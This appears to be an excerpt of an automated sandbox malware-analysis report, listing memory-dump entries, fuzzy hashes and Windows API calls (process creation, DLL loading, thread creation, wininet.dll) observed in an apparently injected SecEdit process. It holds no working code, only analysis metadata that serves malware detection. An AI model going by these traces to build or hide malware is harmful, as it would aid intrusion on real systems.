                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 75121482c20d8ab84c733974a624de975ab73ad4a4ac4a17d4be17fe338e17b1
                                                            • Instruction ID: 854abfacaa8ec0928ebdb7dcc3d8f7c8594d3fd254db2fa74a02b552ccd3a3b2
                                                            • Opcode Fuzzy Hash: 75121482c20d8ab84c733974a624de975ab73ad4a4ac4a17d4be17fe338e17b1
                                                            • Instruction Fuzzy Hash: 0490022524646502E150B15C84056164445A7E0201F56C022A0814594D8A5589556321
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 508e5a5fe13a9de450f71dc2037fd1f4b940c823c64f3a5957d50d7371014cd1
                                                            • Instruction ID: dab8fc51ed31a70724aeda445dbf50ef48bcb2d0358edc3502ad7b60f3c0cca8
                                                            • Opcode Fuzzy Hash: 508e5a5fe13a9de450f71dc2037fd1f4b940c823c64f3a5957d50d7371014cd1
                                                            • Instruction Fuzzy Hash: 2790026534241842E100B1588415B060445C7E1301F56C016E1064554D8B19CD526226
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 405d403db8a0b23523788629cc2b106e34585b6442f2f059fb7d1c6cfced81af
                                                            • Instruction ID: 132bdb53448fd6282225f3140e0b9d74444259cca1332277eeea32c59e48f08d
                                                            • Opcode Fuzzy Hash: 405d403db8a0b23523788629cc2b106e34585b6442f2f059fb7d1c6cfced81af
                                                            • Instruction Fuzzy Hash: 8E900225602414425140B168C8459064445ABE1211756C122A0998550D8A5989655765
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 246e991b37ab1d33b5e3755f1b820eaac07ee49c205093730adc3db1caa14eb1
                                                            • Instruction ID: 18fa2e698eb62532dc09582734dc02e6500fc8c09cf562ab25ff4f71b300f992
                                                            • Opcode Fuzzy Hash: 246e991b37ab1d33b5e3755f1b820eaac07ee49c205093730adc3db1caa14eb1
                                                            • Instruction Fuzzy Hash: 06900225212C1442E200B5688C15B07044587D0303F56C116A0154554CCE1589615621
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 51a2a7c124e8bce6f77c5c8ef532e0d978c33ed0e41dde7482c291e5eb873996
                                                            • Instruction ID: f447367314a800352b93e9563d543e38989dfaa85ac07f4eecb29cd1ca890918
                                                            • Opcode Fuzzy Hash: 51a2a7c124e8bce6f77c5c8ef532e0d978c33ed0e41dde7482c291e5eb873996
                                                            • Instruction Fuzzy Hash: 2C90022560241902E101B1588405616044A87D0241F96C023A1024555ECF258A92A231
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 912c958170ad805e7f004ff6b1405f6d026a99a84c41be5dc291409c998a4c6f
                                                            • Instruction ID: 255623412b6a2e369694e30bd6b2b6d6eb2a657d667d6533edf6a01aa07ce16d
                                                            • Opcode Fuzzy Hash: 912c958170ad805e7f004ff6b1405f6d026a99a84c41be5dc291409c998a4c6f
                                                            • Instruction Fuzzy Hash: 1B90026520281803E140B5588805607044587D0302F56C012A2064555E8F298D516235
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e0772f79979692c81b16b384c1ea31a7a2968287f3ba9b5075511086501e4338
                                                            • Instruction ID: 78b03b3d99638f78bf966f88ba24e7c68576b9f882fd946e12be861ca69b045b
                                                            • Opcode Fuzzy Hash: e0772f79979692c81b16b384c1ea31a7a2968287f3ba9b5075511086501e4338
                                                            • Instruction Fuzzy Hash: DE90022D21341402E180B158940960A044587D1202F96D416A0015558CCE1589695321
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: adee50fd0c3f893fe2f9f88c73bb83ddd6b0f9b8d103da0cfd78ea6923002059
                                                            • Instruction ID: db305bb27ae5a4cda222143c829d352b00017a5db732c057b3a134b4f017ea5a
                                                            • Opcode Fuzzy Hash: adee50fd0c3f893fe2f9f88c73bb83ddd6b0f9b8d103da0cfd78ea6923002059
                                                            • Instruction Fuzzy Hash: 7F90022530241403E140B15894196064445D7E1301F56D012E0414554CDE1589565322
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5dcbaa38f5f1463dfa3b54daec625f6e6e423796cce74fa34277eaf403d561ee
                                                            • Instruction ID: 025cc31f9b0631009fbedab67629836fbe3bbaeae3616b97ea74be3d00a14750
                                                            • Opcode Fuzzy Hash: 5dcbaa38f5f1463dfa3b54daec625f6e6e423796cce74fa34277eaf403d561ee
                                                            • Instruction Fuzzy Hash: 73900225243455526545F1588405507444697E0241796C013A1414950C8A269956D721
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3c0307f5ce268a2549d2b6a95ee2605f417c0901469135197412a7a103e90083
                                                            • Instruction ID: 638605b6552b5e9a396d3b263958306c283226d2ac67d6602524cfd48f469978
                                                            • Opcode Fuzzy Hash: 3c0307f5ce268a2549d2b6a95ee2605f417c0901469135197412a7a103e90083
                                                            • Instruction Fuzzy Hash: 6E90023520241813E111B1588505707044987D0241F96C413A0424558D9B568A52A221
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bedf74ae3188f7c395b6f544e1b526c5a38f851b140462c84db2f2124571e330
                                                            • Instruction ID: ab55d4dc40bc5c3c6bfbfb6aa3217ee2ac5690cc64c435166f8a72c830b5159a
                                                            • Opcode Fuzzy Hash: bedf74ae3188f7c395b6f544e1b526c5a38f851b140462c84db2f2124571e330
                                                            • Instruction Fuzzy Hash: 3890023520241C42E100B1588405B46044587E0301F56C017A0124654D8B15C9517621
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e91b0beedd2c8512e0a0470f4c53408dce56f995b395de2ce1efdebd0b7736f6
                                                            • Instruction ID: 9e40f6d2cc5050f519eb28bb8a39757898492fcd42abb5bfef4b475fd2c42232
                                                            • Opcode Fuzzy Hash: e91b0beedd2c8512e0a0470f4c53408dce56f995b395de2ce1efdebd0b7736f6
                                                            • Instruction Fuzzy Hash: 4490023520249C02E110B158C40574A044587D0301F5AC412A4424658D8B9589917221
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a27aa351c66656825e89f637e849795009ad6395588b603080d12048dee0549a
                                                            • Instruction ID: 1c2b28699c5cd5925a4ae24fe22c7f44f735a8be56c47fcc1f6f7638a75bfc3d
                                                            • Opcode Fuzzy Hash: a27aa351c66656825e89f637e849795009ad6395588b603080d12048dee0549a
                                                            • Instruction Fuzzy Hash: 7F90023520241802E100B5989409646044587E0301F56D012A5024555ECB6589916231

                                                            Control-flow Graph

                                                            control_flow_graph 485 580878-58087d 486 58080a-580831 485->486 487 58087f-5808ea call 599dd0 call 59a7e0 call 584270 call 571410 call 5910e0 485->487 500 58090a-580910 487->500 501 5808ec-5808fb PostThreadMessageW 487->501 501->500 502 5808fd-580907 501->502 502->500
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 005808F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 1c99c398469fa4c0f7f11dfc4b2ad13454d6a9531513dd87cd9b78f22418278c
                                                            • Instruction ID: 50bd0e33ae7c0b54c104eccfb4d7c601166e02eae5e6a550c6bcf5b94a969b1e
                                                            • Opcode Fuzzy Hash: 1c99c398469fa4c0f7f11dfc4b2ad13454d6a9531513dd87cd9b78f22418278c
                                                            • Instruction Fuzzy Hash: 3A115CB6D0024D7AEB00A6A49C86DFF7F7CEF81790F008165FD0477141E6698E4A87E1

                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 005808F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 3ebb21670b63177cd7f21cf8dda2c8b91a91a72cb3fa08c8d8e0f3f8c7859c12
                                                            • Instruction ID: f3ed694b368ade194dcc1186996f035b0e521b3573ee332e0ab4a02bcf34a077
                                                            • Opcode Fuzzy Hash: 3ebb21670b63177cd7f21cf8dda2c8b91a91a72cb3fa08c8d8e0f3f8c7859c12
                                                            • Instruction Fuzzy Hash: 4001A9769401597AEB01A6A49C82DEFBF7CEF81355F00C055F908B7141D5254D0A8BE1

                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 005808F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 9400ff0778bdac7587bd17546feb54b1e4b89ad3763cd8b5c25fe36bc285e749
                                                            • Instruction ID: 5c8d56f75c5e7974e954f4060278ea56d0e47fb2f66ad23e575ff8ed0e95ac84
                                                            • Opcode Fuzzy Hash: 9400ff0778bdac7587bd17546feb54b1e4b89ad3763cd8b5c25fe36bc285e749
                                                            • Instruction Fuzzy Hash: 5401C4B5D4024DBAEB00AAE48C86DEFBF7CEF80794F008064F90477141D6685E0A87F2

                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 005808F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: cf0db8bf20dcf734019afe6cc77d4a64fec740e73809653b29b04ee1637f805e
                                                            • Instruction ID: ef7389388dca0806f469b1d00f789e43d94ee0078fd270cde97bf26b1fcdea54
                                                            • Opcode Fuzzy Hash: cf0db8bf20dcf734019afe6cc77d4a64fec740e73809653b29b04ee1637f805e
                                                            • Instruction Fuzzy Hash: 02F028B6A0125D76AB0166E0ACC5CFFAB6CEE807A4F10C175FD08B7141D6294E0657A1
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00592A6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 3b2f4c1649cd4c7cedab1f0f7efbf9e7f19a1904b99aeaa6329987890cedaf4c
                                                            • Instruction ID: 0ccdd627bcc96074f49859b9a830f242627428603907ac3b48158786204a381b
                                                            • Opcode Fuzzy Hash: 3b2f4c1649cd4c7cedab1f0f7efbf9e7f19a1904b99aeaa6329987890cedaf4c
                                                            • Instruction Fuzzy Hash: A9318EB5600706BBCB24DF65C885FE7BBB8BB88704F00852CFA5D5B245D774AA44CBA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 7a8748ca7a07d40615020e45670b5181cc4ce1158c6b7b51f14c46954ea96ff3
                                                            • Instruction ID: 2a755299bd94c5454b29fc0f092ca2065854f010682582487b18f717ee5563be
                                                            • Opcode Fuzzy Hash: 7a8748ca7a07d40615020e45670b5181cc4ce1158c6b7b51f14c46954ea96ff3
                                                            • Instruction Fuzzy Hash: F2313275A0020AAFDB00DFD8D8819EFB7B9FF88304B108559E906E7214D775EE05CBA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 5b2c85f859fd3541cda50df0646067ed3c31d3ea093f33fac28a1776c8a40ccf
                                                            • Instruction ID: a0befcc3da6d418c9a39d4af63bb5f8ee5cdce0b00bb6de549b2c0f442e59618
                                                            • Opcode Fuzzy Hash: 5b2c85f859fd3541cda50df0646067ed3c31d3ea093f33fac28a1776c8a40ccf
                                                            • Instruction Fuzzy Hash: B0313275A0020AAFDB00DFD8D8819EFB7B9FF88304B148559E916EB214D775EE05CBA0
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00581780,kY,005944C7,?), ref: 005879D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID: e
                                                            • API String ID: 2340568224-4024072794
                                                            • Opcode ID: ba807243fc30d7d320032dc57e579819e73e65dea590090f317e836402c3f32a
                                                            • Instruction ID: 8eeab8eac439f683dc4baba6302d3ab5af5ad087b2940bcc7fb5cf52488a5c22
                                                            • Opcode Fuzzy Hash: ba807243fc30d7d320032dc57e579819e73e65dea590090f317e836402c3f32a
                                                            • Instruction Fuzzy Hash: CD1159A1A582473AEF10B7E0DC4AFAA3FA8BB95310F0444D9F8099B083E535DA418755
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(00580D31,00580D59,00580B31,00000000,S{X,00000010,00580D59,?,?,00000044,00580D59,00000010,00587B53,00000000,00580B31,00580D59), ref: 005982A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID: S{X
                                                            • API String ID: 2186235152-952119296
                                                            • Opcode ID: 3ef5de150010b2baf9e9a8639160cef9fc4ccff9139c5c8f1548d8085bd98910
                                                            • Instruction ID: 86371fe1bb58cec131d8d2e11187a4a586afb5e99fbf86b42e57358a3301f29b
                                                            • Opcode Fuzzy Hash: 3ef5de150010b2baf9e9a8639160cef9fc4ccff9139c5c8f1548d8085bd98910
                                                            • Instruction Fuzzy Hash: 7B01C0B2204109BFCB04DE99DC81EEB77AEAFCC754F118208BA19E3240D630FC518BA4
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005842E2
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: cc12b25d517994b9bcc517731b469122a00c5f8ed43c7c54d5fb46cc540c6b3e
                                                            • Instruction ID: fa5c8acd280e8be17ef195af0f5aabc6a769f57f3f1fb5c72c6d6a8101f69373
                                                            • Opcode Fuzzy Hash: cc12b25d517994b9bcc517731b469122a00c5f8ed43c7c54d5fb46cc540c6b3e
                                                            • Instruction Fuzzy Hash: FE011EB9D0020EABDF10EAE4DD46FADBBB8AB54308F004195FD09A7241F631EB14CB91
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00579855
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: df60333ca4035af3795eb17f96f433c8c1637812866560c4fdbfdf0431deeb70
                                                            • Instruction ID: 9e873fe9069b9e0767724729f4cc64664763b5a7715cad09b8ef37262d487b92
                                                            • Opcode Fuzzy Hash: df60333ca4035af3795eb17f96f433c8c1637812866560c4fdbfdf0431deeb70
                                                            • Instruction Fuzzy Hash: 40F0653338061576E63065AAAC06FDBB69CEBC17A1F144425F60CDB1C1D996B84152E9
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00579855
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: d870ddacc431046cb17b063917238504fe210a892dd5982e0ddcb3b196510b10
                                                            • Instruction ID: bac72b68e64ca428222d1efbf2ce568e3b936e4a421a6cd7587b01d144ce7ca0
                                                            • Opcode Fuzzy Hash: d870ddacc431046cb17b063917238504fe210a892dd5982e0ddcb3b196510b10
                                                            • Instruction Fuzzy Hash: A8F02B3338071437E63065AA9C07FDB768CEBC17A0F104424F61CAB1C0CD92B84142E9
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00581499,?,00594613,00581499,005944C7,00594613,?,00581499,005944C7,00001000,?,?,00599A30), ref: 0059819C
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 466c08e0599dceb2b1ac87d31f08fd08cfc95ce86fcefad45fa711f2d663cd9b
                                                            • Instruction ID: 03f885297dc8e6bd69d75e2a337a851a03534d4633644390c608f4383fc4ee3e
                                                            • Opcode Fuzzy Hash: 466c08e0599dceb2b1ac87d31f08fd08cfc95ce86fcefad45fa711f2d663cd9b
                                                            • Instruction Fuzzy Hash: 0BE06D722002047BDA10EE99DC45EAB37ADEFC9710F004408F90CA7241D670B81087B8
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,00583B3D,000000F4,?,?,?,?,?), ref: 005981EF
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
